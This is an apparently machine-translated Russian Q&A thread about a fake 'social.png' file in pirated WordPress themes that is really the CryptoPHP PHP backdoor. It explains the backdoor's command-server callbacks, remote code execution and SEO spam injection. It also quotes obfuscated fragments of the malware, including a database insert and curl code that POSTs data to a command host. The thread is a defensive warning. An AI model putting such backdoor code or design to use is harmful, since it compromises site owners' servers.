Я загрузил некоторые темы WordPress с веб-сайта, и я заметил, что в файл social.png
входит social.png
. Глядя на этот файл, это не настоящий png-файл, а скрипт php, который содержит непонятный непонятный код, и тот же самый для многих плагинов WordPress, распространяемых с других сайтов.
Размер файла составляет 45 кб и имеет этот хэш 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63
Кто-то имеет представление о функции этого файла?
ЭТО файл
Согласно сообщению этого форума :
В принципе, это обратный вызов удаленной оболочки, который использует шифрование с открытым ключом, чтобы позволить хакеру запускать код на вашем сервере. Он генерирует пару ключей RSA для каждой установки, выгружает его на сервер команд (который имеет предварительно заданный список, но может динамически обновляться с других зараженных хостов, чтобы избежать его закрытия) с помощью встроенного ключа, а также отправляет список возможности (eval / exec enabled, информация о сервере) и отправляет их по электронной почте в список писем, найденных в файле.
Он использует конфигурационную систему WordPress для хранения своих данных, поэтому посмотрите в своей базе данных на ключ настройки WP_CLIENT_KEY, который будет выглядеть как куча искаженного текста.
После активации эксплойт возьмет список команд для eval на сервере – возможно, больше оболочек или эксплойтов, а также добавит строки в нижний колонтитул страницы. Эти строки, вероятно, являются шпионами blackhat SEO, но он также вводит список серверов управления и управления, с которыми он находится в контакте, так как любые другие зараженные сайты будут использовать ваш сервер для поиска других.
Как я заметил в комментариях, сценарий будет обновлять и хранить данные в базе данных WP:
$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')"); ...
Как указано в сообщении форума, для доступа к скрипту. Сценарий также отправляет данные, предположительно открытый ключ, на указанный сервер через запрос shell POST
:
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv"); curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true); if (isset($WbKPQMoSbMZkXUeYKXRI)) { curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI); }
Независимо от точной цели сценария, вы должны удалить все ссылки на него и полностью избавиться от скрипта .
Это взломать WordPress с помощью фальшивых изображений png. Быть осторожен!
@AndreaF – Потрясение действительно? Файл хакерской версии social.png CryptoPHP предназначен только для пиратских / украденных программ (плагинов, тем и т. Д.). Этот тип взлома троянских коней продолжается вечно. Если вы попытаетесь получить что-то пиратское / украденное бесплатно, то ожидайте, что будете страдать от последствий.